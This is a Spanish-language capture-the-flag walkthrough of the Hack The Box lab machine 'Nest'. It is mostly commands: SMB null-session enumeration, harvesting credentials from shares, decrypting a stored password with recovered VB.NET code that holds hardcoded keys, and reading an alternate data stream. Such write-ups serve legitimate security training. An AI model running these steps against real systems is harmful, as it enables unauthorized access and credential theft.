NEST - HackMD

# NEST ~~~ nmap -sS --min-rate 5000 -p- 10.10.10.178 -oG allPorts ~~~ ![](https://i.imgur.com/LjgOXX4.png) ~~~ smbmap -H 10.10.10.178 -u '' smbmap -H 10.10.10.178 -u 'null' smbmap -H 10.10.10.178 -u 'cualquiercosa' ~~~ ![](https://i.imgur.com/4qI1iFm.png) ~~~ smbclient -L \\\\10.10.10.178\\ -N ~~~ ![](https://i.imgur.com/izVIYzH.png) ![](https://i.imgur.com/bZtoLS0.png) ~~~ smbclient \\\\10.10.10.178\\Data -N smb: \> mask "" smb: \> recurse smb: \> prompt smb: \> mget * ~~~ ![](https://i.imgur.com/G2KVWe2.png) ![](https://i.imgur.com/KiBb7Nq.png) ~~~ Username: TempUser Password: welcome2019 ~~~ ~~~ crackmapexec smb 10.10.10.178 -u 'TempUser' -p 'welcome2019' ~~~ ![](https://i.imgur.com/hg30pS1.png) ~~~ smbmap -u 'TempUser' -p 'welcome2019' -H 10.10.10.178 ~~~ ![](https://i.imgur.com/kw7oixf.png) ~~~ smbmap -u 'TempUser' -p 'welcome2019' -H 10.10.10.178 -R ~~~ ![](https://i.imgur.com/oVQpSTJ.png) ~~~ smbmap -u 'TempUser' -p 'welcome2019' -H 10.10.10.178 -R 'Users\' ~~~ ![](https://i.imgur.com/Xsj4Lqb.png) ~~~ smbclient \\\\10.10.10.178\\Data -U 'TempUser' smbclient \\\\10.10.10.178\\Data -U 'TempUser%welcome2019' smbclient \\\\10.10.10.178\\Data -U 'TempUser'%'welcome2019' ~~~ ![](https://i.imgur.com/xNtIqj5.png) ~~~ telnet 10.10.10.178 4386 >HELP >SETDIR / ~~~ ![](https://i.imgur.com/F7sSgrh.png) ~~~ >LIST ~~~ ![](https://i.imgur.com/44xBCbB.png) ~~~ mount -t cifs //10.10.10.178/Data /mnt/smbMounted/ -o "username=TempUser,password=welcome2019" umount /mnt/smbMounted ~~~ ~~~ tree -fas ~~~ ![](https://i.imgur.com/HMd1VxK.png) ~~~ cat ./IT/Configs/NotepadPlusPlus/config.xm ~~~ ![](https://i.imgur.com/e0WJSp7.png) ~~~ <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" ~~~ ~~~ cat ."/IT/Configs/RU Scanner/RU_config.xml" ~~~ ![](https://i.imgur.com/1SlZbMZ.png) ~~~ <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password> ~~~ ~~~ mount -t cifs //10.10.10.178/Secure$ /mnt/smbMounted/ -o "username=TempUser,password=welcome2019" ~~~ ![](https://i.imgur.com/6wu73LV.png) Tener en cuenta que aunque no podamos visualizar algunos recursos, a nivel de permisos puede que tengamos acceso a algunos de esos recursos: ![](https://i.imgur.com/ocG2dEy.png) ~~~ tree -fas ~~~ ![](https://i.imgur.com/TMI6JAG.png) ~~~ ls -l ~~~ ![](https://i.imgur.com/FJD619v.png) ~~~ cat Module1.vb ~~~ ![](https://i.imgur.com/bpGOvOd.png) ~~~ cat SsIntegration.vb ~~~ ![](https://i.imgur.com/U5K75ua.png) ~~~ cat Utils.vb ~~~ ![](https://i.imgur.com/fTiLrdA.png) Enlace https://dotnetfiddle.net/ para compilar código vb de manera online: ![](https://i.imgur.com/n6kxF8X.png) Codigo usado: ~~~ Imports System.Text Imports System.Security.Cryptography Imports System Public Class Utils Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function Public Shared Function EncryptString(PlainString As String) As String If String.IsNullOrEmpty(PlainString) Then Return String.Empty Else Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function Public Shared Function Encrypt(ByVal plainText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue) Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes) Using memoryStream As New IO.MemoryStream() Using cryptoStream As New CryptoStream(memoryStream, _ encryptor, _ CryptoStreamMode.Write) cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length) cryptoStream.FlushFinalBlock() Dim cipherTextBytes As Byte() = memoryStream.ToArray() memoryStream.Close() cryptoStream.Close() Return Convert.ToBase64String(cipherTextBytes) End Using End Using End Function Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue) Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes) Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes) Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read) Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length) Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length) memoryStream.Close() cryptoStream.Close() Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount) System.Console.WriteLine(plainText) Return plainText End Function Public Class SsoIntegration Public Property Username As String Public Property Password As String End Class Sub Main() Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")} End Sub End Class ~~~ ![](https://i.imgur.com/qMQWJRr.png) ~~~ xRxRxPANCAK3SxRxRx ~~~ ~~~ crackmapexec smb 10.10.10.178 -u 'c.smith' -p 'xRxRxPANCAK3SxRxRx' ~~~ ![](https://i.imgur.com/meyIqZ4.png) ~~~ smbmap -H 10.10.10.178 -u 'c.smith' -p 'xRxRxPANCAK3SxRxRx' -r 'Users' smbmap -H 10.10.10.178 -u 'c.smith' -p 'xRxRxPANCAK3SxRxRx' -r 'Users/C.Smith' ~~~ ![](https://i.imgur.com/OgUk9Qn.png) ~~~ smbmap -H 10.10.10.178 -u 'c.smith' -p 'xRxRxPANCAK3SxRxRx' --download 'Users/C.Smith/user.txt' ~~~ ![](https://i.imgur.com/eQy6gyJ.png) ~~~ mount -t cifs //10.10.10.178/Users /mnt/smbMounted/ -o "username=c.smith,password=xRxRxPANCAK3SxRxRx" ~~~ ![](https://i.imgur.com/tm1WdNn.png) ![](https://i.imgur.com/b8Qcp1I.png) ~~~ cat Debug\ Mode\ Password.txt ~~~ ![](https://i.imgur.com/BPQw563.png) En las máquinas windows hay un concepto que se debe tener en cuenta y es el de ADS(Alternative Data String) ~~~ smbclient \\\\10.10.10.178\\Users -U 'c.smith'%'xRxRxPANCAK3SxRxRx' cd "C.Smith\HQK Reporting\" get "Debug Mode Password.txt:Password" ~~~ ![](https://i.imgur.com/Lx958fu.png) ![](https://i.imgur.com/BPOqsI0.png) ~~~ allinfo "Debug Mode Password.txt" ~~~ ![](https://i.imgur.com/tq1xSuC.png)